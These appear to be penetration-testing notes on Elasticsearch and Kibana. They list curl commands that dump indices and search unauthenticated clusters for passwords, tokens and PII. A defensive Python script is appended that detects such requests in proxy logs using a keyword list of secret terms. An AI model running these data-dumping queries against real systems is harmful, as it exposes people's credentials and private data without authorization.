Elasticsearch / Kibana
What it is: Distributed search and analytics engine. Stores data in JSON indices. Frequently exposed without authentication, leaking credentials, PII, and application data. Kibana is its visualization frontend.
Default ports: 9200 (Elasticsearch), 5601 (Kibana)
Vuln research:
Check Elasticsearch (port 9200)
Unauthenticated by default — Dump all indices
curl -s "http://$IP:9200/"
curl -s "http://$IP:9200/_cat/indices?v"
curl -s "http://$IP:9200/_search?pretty"
Example Output
{
  "name" : "node-1",
  "cluster_name" : "elasticsearch",
  "version" : { "number" : "7.17.0" }
}
Indices may contain credentials, PII, logs
Dump specific index
curl -s "http://$IP:9200/<index>/_search?pretty&size=100"
Search for sensitive data — Credentials, tokens, PII
curl -s "http://$IP:9200/_all/_search?q=password&pretty"
Kibana (port 5601)
Dashboard may expose sensitive data — Check for open access
curl -s http://$IP:5601/api/status
# If accessible, browse dashboards for credentials/data
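
Added example (not part of the original notes): a defender-side check that scans proxy access logs for the requests listed above when they were answered without authentication. It assumes Elasticsearch and Kibana sit behind nginx using the "combined" log format; the sample lines, IP addresses and keyword list are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: nginx "combined" access-log format on a proxy in front of ES/Kibana.
LINE = re.compile(
    r'(?P<src>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
SECRET_TERMS = ("password", "passwd", "secret", "token", "apikey")  # constructed list

def classify(target):
    """Return the reasons a request target matches the enumeration pattern."""
    url = urlsplit(target)
    path = url.path.rstrip("/")
    reasons = []
    if path.startswith("/_cat/indices"):
        reasons.append("index listing")
    if path in ("/_search", "/_all/_search"):
        reasons.append("cluster-wide search")
    query_text = " ".join(parse_qs(url.query).get("q", [])).lower()
    if any(term in query_text for term in SECRET_TERMS):
        reasons.append("keyword search for secrets")
    if path == "/api/status":
        reasons.append("Kibana status probe")
    return reasons

def findings(lines):
    """Return (source, target, reasons) for matching requests served anonymously."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        reasons = classify(m["target"])
        # remote_user "-" plus status 200 means the data was served without auth.
        if reasons and m["user"] == "-" and m["status"] == "200":
            hits.append((m["src"], m["target"], reasons))
    return hits

# Constructed sample log lines (documentation IP ranges).
SAMPLE = [
    '203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /_cat/indices?v HTTP/1.1" 200 512 "-" "curl/8.4.0"',
    '203.0.113.7 - - [12/Mar/2024:10:01:09 +0000] "GET /_all/_search?q=password&pretty HTTP/1.1" 200 8841 "-" "curl/8.4.0"',
    '198.51.100.20 - svc_app [12/Mar/2024:10:02:00 +0000] "POST /orders/_search HTTP/1.1" 200 1200 "-" "app/1.0"',
    '203.0.113.9 - - [12/Mar/2024:10:03:00 +0000] "GET /_cat/indices?v HTTP/1.1" 401 90 "-" "curl/8.4.0"',
]

if __name__ == "__main__":
    for src, target, reasons in findings(SAMPLE):
        print(f"{src} {target} -> {', '.join(reasons)}")
```

Any hit means the proxy passed an anonymous request through to the cluster and got a 200 back, so authentication and network exposure on that node need review.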